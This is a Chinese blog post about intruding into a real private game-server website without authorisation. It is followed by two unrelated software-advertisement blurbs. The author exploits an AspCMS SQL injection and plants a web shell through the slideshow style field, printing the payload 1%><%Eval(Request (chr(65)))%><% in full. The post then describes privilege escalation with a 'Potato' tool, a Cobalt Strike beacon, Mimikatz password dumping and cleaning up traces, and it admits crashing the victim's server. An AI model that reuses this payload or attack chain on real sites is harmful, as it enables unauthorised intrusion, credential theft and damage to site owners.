记一次游戏私服getshell过程

晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。

传统的游戏宣传页面,没啥东西

试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~

这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注入,但是前提你得需要知道后台的目录,这里就不透露啦~网上关于这个版本的漏洞分析的文章不少。


得到后台账户密码后,我们登录后台

嗯,没错,熟悉的页面~还是那个味!


本来还犯困的我突然精神了,简单的翻了翻后台的各个功能块,上传点基本都没法利用,写死了


aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5,这方法就不好用了

真巧,我们这个还就是IIS7.5


不要慌,我这里还有用一种拿shell的方法,也是之前看到过某位表哥的文章学习到的


进入后台,“扩展功能”–“幻灯片设置”–”幻灯样式”

使用浏览器的F12的开发者调试工具,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

按道理讲其实这一步操作完,直接用菜刀连接/config/AspCms_Config.asp这个配置文件,密码为a就可以getshell了,但是由于我手残,也可能是太晚了脑子不清醒,我把内容输错了,服务器配置文件出错了,导致服务器500了

这怎么办,加了一下他们的游戏群,或许管理员应该会修复吧。


第二天一起床,先看了一下群消息,果不其然,群内好多吐槽的,我也跟着吐槽了一下,其实希望管理员快点修复

发完这句话,心中默念了三句(对不起,对不起,对不起)
下午回家后,看了一眼群消息

太棒了,给管理员点个赞,网站修好了,按照同样的步骤,我一个字母一个字母的操作,终于用菜刀连接上了,还好没出错,再搞崩了我就没心态了

执行了一下whoami,权限太低,需要提权

tasklist查看了一下进程,没有杀软。只有一些游戏管理工具跟常用的服务软件


朋友说应该可以直接用土豆提权,上传了一个土豆提权工具,执行了一下whoami,system,可以

服务器开启cs服务,本地登录客户端,开启监听,生成了一个cs马

上传到服务器直接利用土豆运行一下
成功上线,system权限。

时间不早了,利用MImikatz读取服务器登录密码,成功登录服务器,截了个图,把痕迹清理一下,就不乱动他的东西了。睡觉~


最后一句,大佬绕道,勿喷。

软件名称: 私服发布网站管理系统 软件版本: v1.2 软件类型: 商业版 发布日期: 2015年3月3日 运行环境:PHP5 + MYSQL5 简介: 私服发布网站管理系统自发布以来,一直致力为广大私服站长及骨灰玩家提供专业的私服导航服务。 作为商业软件产品,在代码质量、运行效率、负载能力、安全等级、功能可操控性和权限严密性、效率最优化和负载能力最佳化设计等方面都在广大用户中有良好的口碑。 功能简介: 会员自助发布: 会员发布,会员发布管理,发布审核。 架构轻盈,完全免费与开源: 采用轻量MVC架构开发,兼顾效率与拓展性。全局高效缓存,打造飞速体验。 让简洁与强大并存: 强大字段自定义功能,完善的后台开关模块,不会编程也能搭建网站系统。 顶级搜索优化功能: 纯静态、伪静态,全部支持自由设置规则,内容、栏目自由设置URL格式。 升级、备份、转移一键完成: 一键升级、一键备份、一键转移。从此,让你的网站维护变得如此轻松。 系统功能: 1、会员自助发布,会员发布管理,发布审核 2、系统功能:静态HTML生成、自定义模板标签、附件清理、数据备份恢复 3、在线升级:一键自动在线安全补丁升级,免除维护烦恼 4、自定义字段:强大的自定义字段功能,可按栏目、频道添加各种输入字段,包括文本、数字、单选、多选、编辑器、单附件、多附件、频道关联,并可针对附件单独制定缩略图设置 5、搜索引擎优化:独立的页面优化信息设置,方便快捷 6、HTML静态:全站纯静态生成功能 7、伪静态:全站伪静态功能,可自由指定伪静态规则 8、附件检测:自动附件清理功能,一键清除未使用多余附件,保持系统纯净 9、高效缓存:全站高效缓存机制,运行飞速体验 10、全功能权限设定:分组机制管理权限设定,全功能全栏目均可指定管理权限 系统安装方法请参考:“安装教程.doc” 版权所有:无版权限制可随意传播 QQ:1915127502 访问网站后台:http://你的网址/doyo.php 后台帐号、密码:admin(登录成功后请及时修改密码)
游戏发布站整站程序代码是一款以asp+access的游戏发布网站。版本功能强大,无任何漏洞,无任何限制.修改QQ以及网站地址就可以直接用(修正搜索引擎优化,若干BUG) 【详细功能】 1、私服分套红固顶,套黄推荐,以及私服分类支持; 2、首页分套红固顶、套黄推荐、今天开放、即将开放、昨天开放和所有私服显示; 3、套黄推荐私服当天自动提升并红字加粗显示,系统自动排名; 4、私服搜索查找功能; 5、全站自动生成HTML页面功能,后台操作过程中即可更新相关HTML页面; 6、页面关键字可在后台修改; 7、私服分类支持各种私服类型,具体操作点击 基本设置→游戏类型 内有说明; 8、私服按开放时间排名,套红和套黄私服可在后台按发布时间控制排名; 9、后台批量审核、删除等,信息灵活管理; 10、任意在线发布各类私服、家族信息,后台可设置为自动审核和手动审核两种; 11、家族也具有固顶、分类功能,管理员后台操作; 12、游戏类型自由设置,如传奇、传奇3、天龙八部、完美世界、魔兽、天堂等; 13、游戏版本功能,可在后台添加或修改; 14、各种私服单页面显示功能,无限分类,可选择查看分类私服; 15、首页横幅广告功能,支持FLASH和图片,数量不限,可控制排名; 16、站内所有广告均在后台管理,支持FLASH和图片; 17、广告价格栏目内容可在后台添加或修改; 18、文章和下载全部后台添加,支持固定等功能; 19、优化所有代码,使其运行更快; 20、全站生成HTML静态页面,与后台分离,更安全、更稳定、更方便。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值